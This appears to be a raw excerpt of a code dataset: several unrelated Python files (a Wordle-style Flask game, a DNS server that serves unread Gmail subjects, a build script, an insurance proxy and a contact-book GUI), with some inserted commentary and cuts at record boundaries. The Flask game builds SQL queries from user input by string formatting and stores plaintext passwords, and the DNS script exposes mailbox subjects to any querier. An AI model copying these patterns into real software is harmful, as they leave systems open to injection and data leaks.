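    """Sketch inferred from the tests; the real class lives in fifo_animal_shelter."""

    def __init__(self):
        self.cat_queue = Queue()
        self.dog_queue = Queue()
        self._next_id = 1  # assumption: ids are assigned at enqueue time

    def enqueue(self, animal):
        animal.animal_id = self._next_id
        self._next_id += 1
        queue = self.cat_queue if isinstance(animal, Cat) else self.dog_queue
        queue.enqueue(animal)

    def dequeue(self, pref=None):
        if pref == "cat":
            return self.cat_queue.dequeue()
        if pref == "dog":
            return self.dog_queue.dequeue()
        if pref is None:
            # No preference: adopt out whichever species has waited longest,
            # i.e. the front animal with the smaller (earlier) id.
            if self.cat_queue.is_empty():
                return self.dog_queue.dequeue()
            if self.dog_queue.is_empty():
                return self.cat_queue.dequeue()
            if self.dog_queue.peek().animal_id < self.cat_queue.peek().animal_id:
                return self.dog_queue.dequeue()
            return self.cat_queue.dequeue()
        return None  # unknown species, per test_request_snake
```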
{0} is {1}\".format(name, current_state[i]['account'])\n            print(\"BALANCE: {0} is {1}\".format(name, current_state[i]['account']))\n            client = True\n    if not client:\n        this_string += \"BALANCE: NO CLIENT\"\n        print(\"BALANCE: NO CLIENT\")\n\n    this_string += \"\\n\"\n    return this_string\n\n\ndef transfer(name_from, name_to, value):\n    this_string = \"\"\n\n    deposit(name_to, value)\n    withdraw(name_from, value)\n    this_string += \"TRANSFER: From {0} to {1} {2}\".format(name_from, name_to, value)\n    print(\"TRANSFER: From {0} to {1} {2}\".format(name_from, name_to, value))\n\n    this_string += \"\\n\"\n    return this_string\n\n\ndef income(percent):\n    this_string = \"\"\n\n    for i in range(len(current_state)):\n        if int(current_state[i]['account']) > 0:\n            current_account = int(current_state[i]['account'])\n            current_account += int(current_account * (int(percent) / 100))\n            current_state[i]['account'] = str(current_account)\n    this_string += \"INCOME: All users get {0}%\".format(percent)\n    print(\"INCOME: All users get {0}%\".format(percent))\n\n    this_string += \"\\n\"\n    return this_string\n\n\ndef startCommand(command_string):\n    command_console.delete(1.0, END)\n    transaction_history = \"\"\n    commands = command_string.split(\"\\n\")\n\n    for i in range(len(commands)):\n        command = commands[i].split(\" \")\n        if command[0] == \"DEPOSIT\":\n            if len(command) == 3:\n                transaction_history += deposit(command[1], command[2])\n        if command[0] == \"WITHDRAW\":\n            if len(command) == 3:\n                transaction_history += withdraw(command[1], command[2])\n        if command[0] == \"BALANCE\":\n            if len(command) == 2:\n                transaction_history += balance(command[1])\n        if command[0] == \"TRANSFER\":\n            if len(command) == 4:\n                transaction_history += transfer(command[1], command[2], command[3])\n        if command[0] == \"INCOME\":\n            if len(command) == 2:\n                transaction_history += income(command[1])\n\n    command_output['text'] = transaction_history\n\n\ncommand_button = Button(first_frame, text=\"Calculate\")\ncommand_button.pack(side=LEFT, padx=5)\ncommand_button.bind('<Button-1>', key)\n\n# command_console = Text(main_frame, textvariable=command_line)\ncommand_console = Text(first_frame, width=35)\ncommand_console.pack(side=LEFT, padx=5)\n\nscroll = Scrollbar(first_frame, command=command_console.yview)\nscroll.pack(side=LEFT, fill=Y)\n\ncommand_console.config(yscrollcommand=scroll.set)\n\ncommand_output = Label(first_frame, text=\"Текст\")\ncommand_output.pack(side=LEFT, padx=5)\n\nGUI.mainloop()\n","repo_name":"Lavreek/Python-Test-excercises","sub_path":"exercise_2/exercise_2.py","file_name":"exercise_2.py","file_ext":"py","file_size_in_byte":4891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
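The command interpreter above (startCommand and its handlers) scans current_state, a list of dicts, once per operation. A dict keyed on the client name makes every lookup O(1) and removes the duplicated search loops; a sketch of three of the handlers under that assumption (not the exercise's required structure):

```python
accounts = {"Ivanov": 70155120}  # name -> balance

def deposit(name, value):
    # Creates the account on first deposit, like the list-based version.
    accounts[name] = accounts.get(name, 0) + int(value)
    return "DEPOSIT: {1} to {0}\n".format(name, value)

def withdraw(name, value):
    # Also creates the account (with a negative balance) if it is unknown.
    accounts[name] = accounts.get(name, 0) - int(value)
    return "WITHDRAW: {1} from {0}\n".format(name, value)

def balance(name):
    if name not in accounts:
        return "BALANCE: NO CLIENT\n"
    return "BALANCE: {0} is {1}\n".format(name, accounts[name])
```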
+{"seq_id":"21878486745","text":"import re\nfrom flask import Flask\nfrom flask import render_template\nfrom flask import redirect\nfrom flask import request\nimport random\nfrom sutom import *\nimport sqlite3\n\n\napp=Flask(__name__)\n\nglobal ini #ini tracks whether we are at the start of a game or not\nglobal longueur #length of the word to guess\nglobal essais #allowed number of guesses\nglobal nb_essais #number of guesses used in the current game\nglobal verifreload # checks whether the user reloaded after winning\nglobal login\n\nlogin=0\nessais=6\nlongueur=5\nini =0\nverifreload=0\n\ndef testconnect():\n    global login\n    if login!=0:\n        print(login)\n        return True\n    else:\n        return False\n\n@app.route('/')\ndef initial():\n    global login\n    login=0\n    global ini\n    ini=0\n    return redirect(\"/jeusanslogin\")\n\n\n@app.route('/inscription')\ndef inscription():\n    global login\n    login=0\n    return render_template('inscription.html')\n\n@app.route('/register',methods=[\"POST\"])\ndef register():\n    global ini\n    ini=0\n    db=sqlite3.connect('projet.db')\n    cur=db.cursor()\n    cur.execute(\"SELECT pseudo FROM user\")\n    users=cur.fetchall()\n    login=request.form.get(\"login\")\n    mdp=request.form.get(\"mdp\")\n    if not login:\n        return render_template('erreur.html',message=\"Login non renseigné\")\n    if not mdp:\n        return render_template('erreur.html',message=\"Mot de passe non renseigné\")\n    if login in users:\n        return render_template('erreur.html',message=\"Login déjà utilisé, veuillez en choisir un autre.\")\n    cur.execute(\"INSERT INTO user (pseudo,mdp,parties_jouees,parties_gagnees) VALUES (?,?,0,0)\",(login,mdp))\n    db.commit()\n    db.close()\n    return render_template('inscription_reussie.html')\n\n@app.route('/login')\ndef connexion():\n    global ini,login\n    ini=0\n    login=0\n    return render_template('login.html')\n\n@app.route('/loginbis',methods=['POST'])\ndef loginbis():\n    db=sqlite3.connect('projet.db')\n    cur=db.cursor()\n    pseudo=request.form.get(\"login\")\n    mdp=request.form.get(\"mdp\")\n    cur.execute(\"SELECT pseudo FROM user where pseudo='{}'\".format(pseudo))\n    users=cur.fetchone()\n    print(users)\n    \n    if not users:\n        return render_template('erreur.html',message=\"Login inconnu. Veuillez vous inscrire.\")\n    cur.execute(\"SELECT mdp FROM user WHERE pseudo='{}'\".format(pseudo))\n    bonmdp=cur.fetchone()[0]\n    if mdp!=bonmdp:\n        return render_template('erreur.html',message=\"Mot de passe incorrect\")\n    global login\n    login=pseudo\n    return redirect('/jeulogin')\n\n@app.route('/deconnexion')\ndef deconnexion():\n    global login \n    login=0\n    return redirect('/jeusanslogin')\n\nglobal mot\nmot=0\n\n@app.route('/jeusanslogin',methods=[\"POST\",\"GET\"])\ndef jeusanslogin():\n    if testconnect():\n        return redirect(\"/deco\")\n    global ini,L,T,bonnes,longueur,essais,nb_essais,verifreload,motatrouve,mot,rej #mot is tracked so a refresh does not consume an extra guess\n    print(\"ini\",ini)\n    \n    if verifreload!=0:\n        ini=0\n        verifreload=0\n    if ini==0:\n        rej=\"Proposer\"\n        ini+=1\n        nb_essais=0\n        L=[]\n        T=[]\n        L.append(\"Longueur du mot à trouver : {}\".format(longueur))\n        db=sqlite3.connect('projet.db')\n        cur=db.cursor()\n        cur.execute(\"SELECT mot FROM dico WHERE longueur={}\".format(longueur))\n        mots=cur.fetchall()\n        n=random.randint(0,len(mots)-1)\n        motatrouve=mots[n][0]\n        print(\"motatrouve\",motatrouve)\n        db.close()\n        g=\"Longueur du mot : {}, Essais : {}/{}\".format(longueur,nb_essais,essais)\n        bonnes = ['-' for i in range(longueur)] \n        return render_template('jeusanslogin.html',liste=L,test=T,gagne=g,long=longueur,essai=essais,boutonrejouer=rej)\n    else:\n        y=0 #to check the word has the right length\n        g=\"Longueur du mot : {}, Essais : {}/{}\".format(longueur,nb_essais,essais)\n        motp=request.form.get(\"motprop\")\n        if motp==mot: #avoids refresh problems\n            pass\n        else:\n            mot=motp\n        print(\"mot\",mot)\n        if mot == \"\" or len(mot)!=longueur:\n            g=\"Mauvaise longueur. 
Longueur du mot : {}, Essais : {}/{}\".format(longueur,nb_essais,essais)\n        else:\n            bonnes,bonnesponctuel,malponctuel,faussesponctuel=prop(mot,motatrouve,longueur,bonnes)\n            #print(bonnes)\n            nb_essais+=1\n            g=\"Longueur du mot : {}, Essais : {}/{}\".format(longueur,nb_essais,essais)\n            if bonnes==0:\n                g=\"Vous avez gagné ! \"\n                verifreload=1\n                rej=\"Recommencer\"\n                bonneliste=[]\n                for lettre in motatrouve:\n                    bonneliste.append((lettre,\"carrevert\"))\n                T.append(bonneliste)\n            elif nb_essais==essais:\n                bonneliste=[]\n                #print(bonnesponctuel,malponctuel,faussesponctuel)\n                for i in range(longueur):\n                    if bonnesponctuel[i]!='-':\n                        bonneliste.append((bonnesponctuel[i],\"carrevert\"))\n                    elif malponctuel[i]!='-':\n                        bonneliste.append((malponctuel[i],\"carreorange\"))\n                    else:\n                        bonneliste.append((faussesponctuel[i],\"carregris\"))\n                T.append(bonneliste)\n                g=\"Vous avez perdu ! Le mot était {}\".format(motatrouve)\n                verifreload=1\n            else:\n                bonneliste=[]\n                for i in range(longueur):\n                    if bonnesponctuel[i]!='-':\n                        bonneliste.append((bonnesponctuel[i],\"carrevert\"))\n                    elif malponctuel[i]!='-':\n                        bonneliste.append((malponctuel[i],\"carreorange\"))\n                    else:\n                        bonneliste.append((faussesponctuel[i],\"carregris\"))\n                T.append(bonneliste)\n            #print(T)\n            return render_template('jeusanslogin.html',liste=L,test=T,gagne=g,long=longueur,essai=essais,boutonrejouer=rej)\n\n@app.route('/jeulogin',methods=[\"GET\",\"POST\"])\ndef jeulogin():\n    if not testconnect():\n        return redirect('/login')\n    global ini,L,bonnes,longueur,essais,nb_essais,verifreload,motatrouve,login,mot\n    print(\"ini\",ini)\n    \n    if verifreload!=0:\n        ini=0\n        verifreload=0\n    if ini==0:\n        ini+=1\n        nb_essais=0\n        L=[]\n        L.append(\"Longueur du mot à trouver : {}\".format(longueur))\n        db=sqlite3.connect('projet.db')\n        cur=db.cursor()\n        cur.execute(\"SELECT mot FROM dico WHERE longueur={}\".format(longueur))\n        mots=cur.fetchall()\n        n=random.randint(0,len(mots)-1)\n        motatrouve=mots[n][0]\n        print(\"motatrouve\",motatrouve)\n        db.close()\n        g=\"\"\n        \n        bonnes = ['-' for i in range(longueur)] \n        return render_template('jeulogin.html',liste=L,login=login)\n    else:\n        g=\"\"\n        print(\"motprop\",request.form.get(\"motprop\"))\n        motp=request.form.get(\"motprop\")\n        if motp==mot:\n            pass\n        else:\n            mot=motp\n            if mot == \"\" or len(mot)!=longueur:\n                L.pop()\n                L.append(\"Mauvaise longueur de mot, réessaye\") # prevent empty words or words of the wrong length\n            else:\n                bonnes,bonnesponctuel,malponctuel,faussesponctuel=prop(mot,motatrouve,longueur,bonnes)\n                #print(bonnes)\n                nb_essais+=1\n                L.pop()\n                if bonnes==0:\n                    g=\"Vous avez gagné ! \"\n                    verifreload=1\n                    L.append(\"{}\".format(mot))\n                    db=sqlite3.connect(\"projet.db\")\n                    cur=db.cursor()\n                    cur.execute(\"SELECT parties_jouees,parties_gagnees FROM user WHERE pseudo='{}'\".format(login))\n                    parties=cur.fetchone()\n                    part_j,part_g=parties[0]+1,parties[1]+1\n                    cur.execute(\"UPDATE user SET parties_jouees = {} WHERE pseudo = '{}'\".format(part_j,login))\n                    cur.execute(\"UPDATE user SET parties_gagnees = {} WHERE pseudo = '{}'\".format(part_g,login))\n\n                    db.commit()\n                    db.close()\n                elif nb_essais==essais:\n                    g=\"Vous avez perdu ! Le mot était {}\".format(motatrouve)\n                    verifreload=1\n                    L.append(\"{}, {}, {}, {}, {}\".format(mot,bonnes,bonnesponctuel,malponctuel,faussesponctuel))\n                    db=sqlite3.connect(\"projet.db\")\n                    cur=db.cursor()\n                    cur.execute(\"SELECT parties_jouees,parties_gagnees FROM user WHERE pseudo='{}'\".format(login))\n                    parties=cur.fetchone()\n                    part_j,part_g=parties[0]+1,parties[1]\n                    cur.execute(\"UPDATE user SET parties_jouees = {} WHERE pseudo = '{}'\".format(part_j,login))\n\n                    db.commit()\n                    db.close()\n                else:\n                    L.append(\"{}, {}, {}, {}, {}\".format(mot,bonnes,bonnesponctuel,malponctuel,faussesponctuel))\n        L.append(\"Nombre d'essais : {} / {}\".format(nb_essais,essais))\n        return render_template('jeulogin.html',liste=L,gagne=g,login=login)\n\n@app.route('/historique_score')\ndef historique_score():\n    if not testconnect():\n        return redirect('/login')\n    db=sqlite3.connect(\"projet.db\")\n    cur=db.cursor()\n    cur.execute(\"SELECT parties_jouees,parties_gagnees FROM user WHERE pseudo='{}'\".format(login))\n    parties=cur.fetchone()\n    nb_jouees=parties[0]\n    nb_gagnees=parties[1]\n    return render_template('historique_score.html',login=login,nb_jouees=nb_jouees,nb_gagnees=nb_gagnees)\n\n@app.route(\"/filtrelettres\",methods=[\"POST\",\"GET\"])\ndef filtrelettres():\n    global longueur,ini\n    ini=0 #reset the game\n    longueur=int(request.form.get(\"nbdelettres\"))\n    if testconnect():\n        return redirect(\"jeulogin\")\n    else:\n        return redirect(\"/jeusanslogin\")\n\n@app.route(\"/filtrechances\",methods=[\"POST\",\"GET\"])\ndef filtrechances():\n    global essais,ini\n    ini=0\n    essais=int(request.form.get(\"nbdechances\"))\n    if testconnect():\n        return redirect(\"jeulogin\")\n    else:\n        return redirect(\"/jeusanslogin\")\n\n@app.route(\"/deco\")\ndef deco():\n    global login\n    login = 0\n    return redirect(\"/jeusanslogin\")","repo_name":"eddd33/JeuSolveurWordle","sub_path":"sitesafe/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":11593,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
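Both game routes in the Wordle-style app above delegate letter scoring to prop() from the sutom module, which this file does not include. Judging from the call sites, it returns 0 on an exact guess, and otherwise the updated list of confirmed letters plus three per-position lists (correct, misplaced, absent). A plausible two-pass implementation of that contract — the names and exact return shape are inferred from the callers, not taken from the module:

```python
def prop(guess, target, length, confirmed):
    """Wordle-style scoring: 0 on an exact guess, otherwise the updated
    `confirmed` list plus per-position correct/misplaced/absent lists."""
    if guess == target:
        return 0, list(guess), ['-'] * length, ['-'] * length
    correct = ['-'] * length
    misplaced = ['-'] * length
    absent = ['-'] * length
    remaining = []  # target letters not matched exactly, available for "misplaced"
    for i in range(length):
        if guess[i] == target[i]:
            correct[i] = guess[i]
            confirmed[i] = guess[i]
        else:
            remaining.append(target[i])
    for i in range(length):  # second pass: misplaced vs absent
        if correct[i] == '-':
            if guess[i] in remaining:
                misplaced[i] = guess[i]
                remaining.remove(guess[i])
            else:
                absent[i] = guess[i]
    return confirmed, correct, misplaced, absent
```

The two-pass split is the usual design choice: exact matches must be claimed first so a repeated letter is never reported as misplaced when all its occurrences are already accounted for.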
+{"seq_id":"74477412965","text":"import socket, struct, imaplib, sys\n\ndef getMsgsFromGmail():\n    m = imaplib.IMAP4_SSL('imap.gmail.com', 993)\n    m.login(sys.argv[1], sys.argv[2])\n    m.select('INBOX', readonly=True)\n    msgs = m.search(None, 'UNSEEN')[1][0].split()\n    count = len(msgs)\n    if msgs:\n        fetchs = m.fetch(','.join(msgs), '(BODY.PEEK[HEADER.FIELDS (SUBJECT)])')[1]\n        raw_fetch_entries = [ item for fetch in fetchs for item in fetch ]\n        subjects = [ entry.strip() for entry in raw_fetch_entries if entry[:7] == 'Subject']\n        subjects_str = \". \".join(subjects)\n    else:\n        subjects_str = \"\"\n\n    return (count, subjects_str)\n\n\nclass Query(object):\n\n    class Header(object):\n        def __init__(self, data):\n            (self.ID, self.FLAGS, self.NQUERIES, self.NREPLIES, self.NNS, self.NADDRES) = \\\n                struct.unpack('!6H', data)\n\n            self.FLAGS = self._parseFlags(self.FLAGS)\n\n        def _parseFlags(self, flags):\n            d = dict()\n            d['RCODE'] = flags & 0xf; flags >>= 4\n            d['Z'] = flags & 0x7; flags >>= 3\n            d['RA'] = flags & 0x1; flags >>= 1\n            d['RD'] = flags & 0x1; flags >>= 1\n            d['TC'] = flags & 0x1; flags >>= 1\n            d['AA'] = flags & 0x1; flags >>= 1\n            d['OPCODE'] = flags & 0xf; flags >>= 4\n            d['QR'] = flags & 0x1; flags >>= 1\n\n            assert(flags == 0)\n\n            return d\n\n    class Question(object):\n        def __init__(self, data, QDCOUNT):\n            self.data = data\n            self.QNAMES = []\n\n            for q in range(QDCOUNT):\n                p = 0\n                fqdn = ''\n                length = struct.unpack(\"!b\", data[p])[0]\n                labels = []\n                while length:\n                    labels.append(data[p+1:p+length+1])\n                    p += length + 1\n                    length = struct.unpack(\"!b\", data[p])[0]\n                self.QNAMES.append( '.'.join(labels) )\n                data = data[p+1:]\n\n            self.QTYPE, self.QCLASS = struct.unpack(\"!HH\", data)\n            \n            #QTYPE should be 16 (TXT)\n            #QCLASS should be 1 (IN)\n\n\n    def __init__(self, data):\n        self.header = Query.Header(data[:12])\n        self.question = Query.Question(data[12:], self.header.NQUERIES)\n\n    def getResponse(self): \n        #res = \"yo yo yo 'sup %s\" % self.question.QNAMES[0].split('.')[0]\n\n        count, subjects = getMsgsFromGmail()\n        res = \"%d Unread. %s\" % (count, subjects)\n\n        #ID, FLAGS, NQUERIES, NREPLIES, NNS, NADDRES\n        resHeader = struct.pack('!6H', self.header.ID, 0x8000, 1, 1, 0, 0)\n        resOrigQuery = self.question.data\n        #NAME, TYPE: txt #CLASS: internet #TTL: no cache #RDLENGTH: length of next field\n        resBody = struct.pack('!HHHIHB%ds' % len(res), 0xc00c, 16,1,0,len(res)+1,len(res),res)\n        \n        resParts = resHeader + resOrigQuery + resBody \n        resData = ''.join(resParts)\n        return resData\n\nif __name__ == \"__main__\":\n    if len(sys.argv) < 3:\n        print(\"Usage: %s <user> <password>\" % sys.argv[0])\n    else:\n        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n        s.bind(('0.0.0.0', 53))\n\n        try:\n            while True:\n                (data, frm) = s.recvfrom(1024)\n                query = Query(data)\n                response = query.getResponse()\n                s.sendto(response, frm)\n        finally:\n            s.close()\n\n\n","repo_name":"dgquintas/my-code-samples","sub_path":"python/dns/fakeDNS.py","file_name":"fakeDNS.py","file_ext":"py","file_size_in_byte":3040,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"}
+{"seq_id":"15540295294","text":"import os\nnasm_env = Environment(tools = ['nasm'],\n                   ENV=os.environ,\n                   AS='nasm',\n                   ASFLAGS='',\n                   OBJSUFFIX=''\n                   )\n\n# print dir(env)\nnasm_env.StaticObject('boot', ['boot.s'],ASFLAGS='-f bin')\n# nasm_env.StaticObject('init.o', 'init.s',ASFLAGS=\"-f elf32\")\n\n\n\nImport('env') \n\nenv.GenerateKernelSize('config.h',['../../duck/init/kernel.elf'])\n\n\ninclude=[\n    '.',\n    'include',\n    '../../duck',\n    '../../duck/platform/'+env['PLATFORM']\n]\n\nsource=['init.c','config.h']\n\nenv.Program('init.elf', \n    source,\n    CPPPATH=include,\n    CFLAGS='$CFLAGS -fno-stack-protector -I. 
-Iinclude -Iarch -std=c99 -std=gnu99 -w ',\n LINKFLAGS= '$LINKFLAGS -T boot/x86/link.ld ') #-Ttext 0x0500 -Wl,-section-start=.apu_boot=0x1000\n\nenv.Objcopy('init.bin','init.elf',OBJCOPYFLAGS='-j .text -O binary -S')","repo_name":"evilbinary/YiYiYa","sub_path":"boot/x86/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":178,"dataset":"github-code","pt":"52"} +{"seq_id":"13799179426","text":"from flask import Flask, request, jsonify;from flask_sqlalchemy import SQLAlchemy\nimport enum;import requests;from datetime import datetime as dt\napp=Flask(__name__);app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///saryah.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False;db=SQLAlchemy(app)\nAD=db.session.add;CM=db.session.commit;FK=db.ForeignKey;RL=db.relationship\nC=db.Column;T=db.DateTime;I=db.Integer;S=db.String\nclass User(db.Model):\n id=C(I,primary_key=True);timestamp=C(T, server_default=db.func.now())\n apple_id=C(I, nullable=False, unique=True)\n email=C(S)\n full_name=C(S)\n def to_dict(self):\n return {key: getattr(self, key, None) for key in [\"id\",\"timestamp\",\"apple_id\",\"email\",\"full_name\"]}\nclass Sex(enum.Enum):F=\"female\";M=\"male\";O=\"other\"\nclass DriverIdType(enum.Enum):ID=\"id\";IQAMA=\"igama\"\nclass Driver(db.Model):\n id=C(I,primary_key=True);timestamp=C(T, server_default=db.func.now())\n first_name=C(S)\n last_name=C(S)\n sex=C(db.Enum(Sex), nullable=False, default=Sex.O)\n nationality=C(S)\n birthday=C(T)\n email=C(S)\n government_id=C(S, unique=True, nullable=False)\n government_id_type=C(db.Enum(DriverIdType), nullable=False)\n national_address=C(S)\n phone_NO=C(S, unique=True)\nclass CarIdType(enum.Enum):CHASSIS=\"chassis\";CUSTOMS=\"customs\"\nclass Car(db.Model):\n id=C(I, primary_key=True);timestamp=C(T, server_default=db.func.now())\n model=C(S)\n model_year=C(S)\n model_manufacturer=C(S)\n global_id=C(S, unique=True, nullable=False)\n global_id_type=C(db.Enum(CarIdType), nullable=False)\n plate_NO=C(S)\n color=C(S)\n body_type=C(S)\nclass Application(db.Model):\n id=C(I,primary_key=True);timestamp=C(T, server_default=db.func.now())\n user_id=C(I, FK(\"user.id\"), nullable=False)\n user=RL(\"User\", foreign_keys=[user_id], backref=\"applications\", lazy=True)\n driver_id=C(I, FK(\"driver.id\"), nullable=False)\n driver=RL(\"Driver\", foreign_keys=[driver_id], backref=\"applications\", lazy=True)\n car_id=C(I, FK(\"car.id\"), nullable=False)\n car=RL('Car', backref='applications', lazy=True)\nclass Transaction(db.Model):\n id = C(I, primary_key=True);timestamp = C(T, server_default=db.func.now())\n application_id=C(I, FK(\"application.id\"), nullable=False)\n application=RL(\"Application\", backref=\"transaction\", lazy=True)\n epow_id = C(I)\n transaction_at = C(T, default=db.func.now())\n subtotal_halalah = C(I)\n vat_halalah = db.ColumnProperty(0.15 * subtotal_halalah)\n total_halalah = db.ColumnProperty(subtotal_halalah + vat_halalah)\nclass Policy(db.Model):\n id=C(I,primary_key=True);timestamp=C(T, server_default=db.func.now())\n transaction_id = C(I, FK(\"transaction.id\"), nullable=False)\n transaction = RL('Transaction', backref='policy', lazy=True)\n provider = C(S)\n issue_at = C(T)\n effective_at = C(T)\n number = C(S)\n type = C(S)\ndef entity_from_json(model:db.Model, json):\n columns:[db.Column]=model.__dict__[\"__table__\"].columns;entity=model()\n for column in columns:\n c_name = column.name\n if c_name in json:\n if type(column.type)==db.Enum:\n 
column_enum = {l.value:l.name for l in column.type.__dict__[\"_valid_lookup\"]\n                               if type(type(l)) == enum.EnumMeta}\n                entity.__setattr__(c_name, column_enum[json[c_name]])\n            elif type(column.type)==db.DateTime: entity.__setattr__(c_name, dt.fromisoformat(json[c_name]))\n            else: entity.__setattr__(c_name, json[c_name])\n    return entity\ndef entity_to_dict(entity, level:int=0):\n    if not entity:\n        return None\n    data = {col:str(entity.__getattribute__(col)) for col in entity.__table__.c.keys()}\n    if level > 0:\n        relations = [key for key in entity.__class__.__dict__.__getitem__(\"_sa_class_manager\").keys() if key not in data]\n        for rel in relations:\n            data[rel] = entity_to_dict(entity.__getattribute__(rel), level-1)\n    return data\n# routes\n@app.route('/login', methods=['POST'])\ndef login():\n    r=request.get_json(force=True)\n    u=User.query.filter_by(apple_id=r[\"apple_id\"]).first()\n    if not u:\n        return jsonify({})\n    return jsonify(entity_to_dict(u))\n@app.route('/sign_up', methods=['POST'])\ndef sign_up():\n    request_data=request.get_json(force=True)\n    u=User.query.filter_by(apple_id=request_data[\"apple_id\"]).first()\n    if not u:\n        del u;u=entity_from_json(User, request_data)\n        AD(u);CM()\n    return jsonify(entity_to_dict(u))\n@app.route(\"/application\", methods=[\"POST\"])\ndef application():\n    request_data=request.get_json(force=True)\n    req = requests.post(\"http://127.0.0.1:4999/person\",\n                 data= '{\"government_id\": %s ,\"car_id\": %s }' % (request_data[\"government_id\"],request_data[\"car_id\"]))\n    if req.status_code != 200: return \"kyc failed\"\n    kyc = req.json();del req\n    user=User.query.filter_by(apple_id = request_data[\"apple_id\"]).first()\n    car=entity_from_json(Car, dict(kyc[\"car\"], **request_data))\n    driver = entity_from_json(Driver, dict(kyc[\"driver\"], **request_data))\n    new_application=Application(user=user,car=car,driver=driver)\n    AD(new_application);CM()\n    return jsonify(entity_to_dict(new_application, 1))\n\nif __name__ == \"__main__\":\n    db.drop_all()\n    db.create_all()\n    app.run(debug=False, port=5000 , host=\"0.0.0.0\")\n","repo_name":"kk-cycls/saryah-proxy","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
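In the proxy above, entity_from_json maps a JSON payload onto a model's columns (decoding Enum and DateTime values along the way) and entity_to_dict serialises an instance, following relationships down to a bounded depth. A round-trip usage sketch against that file's User model; the payload values are illustrative, not from the source:

```python
payload = {"apple_id": 42, "email": "x@example.com", "full_name": "Test User"}

user = entity_from_json(User, payload)  # JSON -> mapped instance
AD(user); CM()                          # the file's aliases for session.add / commit

# level=0 serialises columns only; level=1 would also walk relationships
# such as user.applications, each serialised at level 0.
print(entity_to_dict(user, level=0))
```

Bounding the recursion by `level` is what keeps the back-references (Application.user points back at User) from looping forever.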
+{"seq_id":"38639102109","text":"# encoding: utf-8\nimport PySimpleGUI as sg\n\nfrom backend.contact_statistics import collect_statistics\nfrom frontend.popups.popup_errors import popup_error_101, popup_error_102, popup_to_do, popup_error_103\nfrom frontend.popups.popup_question import popup_question_delete_contact\nfrom frontend.popups.popup_success import popup_success_add_contact\nfrom frontend.window_main import main_layout\nfrom frontend.window_book_list import window_add_contact\nfrom backend.files import write_file, path_file, get_name_in_file, get_contact_list_info, check_contact, strip_string, \\\n    delete_one_element_list, read_lines\n\n\ndef main():\n    # Create the initial windows\n    w_main, w_add_contact, popup_101 = main_layout(), None, None\n\n    while True:\n        window, event, values = sg.read_all_windows()\n\n        # # Close the window\n        if window == w_main and event == sg.WIN_CLOSED:\n            break\n        elif window == w_add_contact and event == sg.WIN_CLOSED:\n            w_add_contact.close()\n            w_main.enable()\n            w_main.bring_to_front()\n\n        if window == w_main:\n            if event == 'btn_search':\n                if len(values['in_search']) == 0:\n                    w_main.FindElement('li_values').Update(get_name_in_file(path_file()))\n                else:\n                    popup_to_do(values)\n            elif event == 'btn_reset':\n                popup_to_do(values)\n            elif event == 'btn_add':\n                w_add_contact = window_add_contact()\n                w_main.disable()\n            elif event == 'btn_edit':\n                # popup_to_do(values)\n                read_lines()\n            elif event == 'btn_delete':\n                try:\n                    element_list = values['li_values'][0]\n                    pop_up_result = popup_question_delete_contact(element_list)\n                    if pop_up_result == 'Yes':\n\n                        # Remove\n                        delete_one_element_list(element_list)\n\n                        # # UPDATE APP\n\n                        # # Update contact info\n                        w_main.FindElement('contact_name').Update('')\n                        w_main.FindElement('contact_phone').Update('')\n                        w_main.FindElement('contact_celphone').Update('')\n                        w_main.FindElement('contact_sex').Update('')\n                        w_main.FindElement('contact_address').Update('')\n                        w_main.FindElement('contact_address_number').Update('')\n                        w_main.FindElement('contact_address_quarter').Update('')\n                        w_main.FindElement('contact_city').Update('')\n                        w_main.FindElement('contact_state').Update('')\n\n                        # # Update listbox\n                        w_main.FindElement('li_values').Update(get_name_in_file(path_file()))\n\n                        # update statistics\n                        list_len, m, f, n, m_percent, f_percent, n_percent = collect_statistics()\n                        w_main.FindElement('qtd_total').Update(list_len)\n                        w_main.FindElement('qtd_men').Update(m)\n                        w_main.FindElement('qtd_women').Update(f)\n                        w_main.FindElement('qtd_none').Update(n)\n                        w_main.FindElement('qtd_men_pct').Update(m_percent)\n                        w_main.FindElement('qtd_women_pct').Update(f_percent)\n                        w_main.FindElement('qtd_none_pct').Update(n_percent)\n\n                except IndexError:\n                    # list index out of range\n                    popup_error_103(values)\n\n            elif event == 'btn_delete_all':\n                popup_to_do(values)\n            elif event == 'li_values':\n                if len(get_name_in_file(path_file())) > 0:\n                    element_list = values['li_values'][0]\n                    name, telephone, celphone, sex, address, address_number, address_quarter, city, state = get_contact_list_info(\n                        element_list)\n\n                    w_main.FindElement('contact_name').Update(name)\n                    w_main.FindElement('contact_phone').Update(telephone)\n                    w_main.FindElement('contact_celphone').Update(celphone)\n                    w_main.FindElement('contact_sex').Update(sex)\n                    w_main.FindElement('contact_address').Update(address)\n                    w_main.FindElement('contact_address_number').Update(address_number)\n                    w_main.FindElement('contact_address_quarter').Update(address_quarter)\n                    w_main.FindElement('contact_city').Update(city)\n                    w_main.FindElement('contact_state').Update(state)\n\n        if window == w_add_contact:\n            if window == w_add_contact:\n                if event == 'btn_add':\n                    name = values['contact_name']\n\n                    validation = check_contact(name)\n\n                    if validation == 200:\n                        # print(\"Entrada válida\")\n\n                        # Sanitize the inputs\n                        name = strip_string(values['contact_name'])\n                        telephone = strip_string(values['contact_phone'])\n                        celphone = strip_string(values['contact_celphone'])\n                        address = strip_string(values['contact_address'])\n                        address_number = strip_string(values['contact_address_number'])\n                        address_quarter = strip_string(values['contact_address_quarter'])\n                        city = strip_string(values['contact_city'])\n                        state = strip_string(values['contact_state'])\n                        if values['sex_male']:\n                            sex = 'Masculino'\n                        elif values['sex_female']:\n                            sex = 'Feminino'\n                        elif values['sex_none']:\n                            sex = 'Não definido'\n\n                        # print(values)\n\n                        write_file(path_file(), name, telephone, celphone, sex, address, address_number,\n                                   address_quarter, city, state)\n                        